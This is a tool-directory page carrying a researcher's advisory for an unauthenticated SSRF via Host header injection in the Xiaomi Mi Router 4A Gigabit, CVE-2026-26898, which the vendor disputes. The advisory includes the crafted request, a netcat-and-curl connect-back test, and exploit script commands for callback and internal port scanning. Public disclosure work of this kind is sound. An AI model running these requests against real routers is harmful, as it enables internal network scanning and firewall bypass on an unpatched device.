Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-26898-Xiaomi-SSRF-HostHeaderInjection — Unauthenticated SSRF in Xiaomi Mi Router 4A Gigabit Edition (firmware 3.0.24) via Host Header Injection — CVE-2026-26898 | Kitploit
Tools/GitHubGitHub/iwallplace/cve-2026-26898-xiaomi-ssrf-hostheaderinjection
Vulnerability AnalysisExploitationWeb Application ExploitationNetwork SecurityPenetration TestingRed Teaming
GitHubiwallplace/cve-2026-26898-xiaomi-ssrf-hostheaderinjection

CVE-2026-26898-Xiaomi-SSRF-HostHeaderInjection

Unauthenticated SSRF in Xiaomi Mi Router 4A Gigabit Edition (firmware 3.0.24) via Host Header Injection — CVE-2026-26898

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
12 months agoNot yet reviewed

CVE-2026-26898: Xiaomi Mi Router 4A Gigabit - SSRF via Host Header Injection

Vulnerability CVSS Status Vendor

Summary

A Server-Side Request Forgery (SSRF) vulnerability exists in the Xiaomi Mi Router 4A Gigabit Edition. The router's web interface fails to validate the HTTP Host header, allowing an unauthenticated attacker to force the router to make arbitrary outbound TCP connections.

FieldValue
DeviceXiaomi Mi Router 4A Gigabit Edition
Firmware3.0.24 (International)
CVECVE-2026-26898 (contested — see Disclosure Status below)
CWECWE-918 (Server-Side Request Forgery)
CVSS 3.18.6 (High) — researcher-assessed; vendor disputes severity

Vendor Response & Disclosure Status

Status: Disputed by vendor — this report was not accepted by Xiaomi.

  • Reported to Xiaomi via HackerOne (report #3513458) on 2026-01-16.
  • On 2026-01-23, Xiaomi closed the report as Informative, stating it is a previously known issue, that the router "still relies on the proxy function," and that they classify it as low-risk and will not address it.
  • Researcher position: the severity rating is disputed. The device is still actively sold on official Xiaomi channels (mi.com/tr) as of Jan 2026, the endpoint is reachable without authentication, and the SSRF enables internal-network scanning and access to services that trust local connections. The behaviour remains unpatched.

CVE-2026-26898 is used here for tracking only; given the vendor dispute it should be treated as contested / unconfirmed, not vendor-confirmed.

Affected Endpoint

root@kitploit:~
GET /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: <ATTACKER_IP>:<PORT>

Proof of Concept

Screenshot

Exploit Demo

Quick Test

root@kitploit:~
python3 xiaomi_ssrf_exploit.py --target 192.168.31.1 --check

Output

root@kitploit:~
[*] Checking vulnerability on 192.168.31.1...
[*] Local IP: 192.168.31.235
[*] Test Port: 44444
[+] VULNERABLE! Router connected back to 192.168.31.235:44444

Manual Test

root@kitploit:~
# Terminal 1: Start listener
nc -l 4444

# Terminal 2: Send malicious request
curl -H "Host: YOUR_IP:4444" "http://192.168.31.1/cgi-bin/luci/api/xqsystem/login"

Impact

  • Internal Network Scanning: Use router as proxy to scan internal networks
  • Firewall Bypass: Access services restricted to router's IP
  • Attack Chain: Can be combined with other vulnerabilities for RCE

Files

FileDescription
xiaomi_ssrf_exploit.pyFull exploit with multiple modes

Exploit Usage

root@kitploit:~
# Check if vulnerable
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --check

# Callback mode
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --callback YOUR_IP --port 4444

# Port scanner
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --scan TARGET_IP --ports 22,23,80,443

Timeline

DateEvent
2026-01-15Vulnerability discovered; PoC developed
2026-01-16Reported to Xiaomi via HackerOne (#3513458)
2026-01-23Xiaomi closed the report as Informative (low-risk, will not fix)

References

  • HackerOne report #3513458 (submitted to Xiaomi; closed Informative)
  • CWE-918: Server-Side Request Forgery (SSRF)

Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal.

Author

Ahmet Mersin
🌐 ahmetmersin.com
🐙 @iwallplace

Download Tool
2026-06-03Public advisory published (this repository) — vendor-disputed, unpatched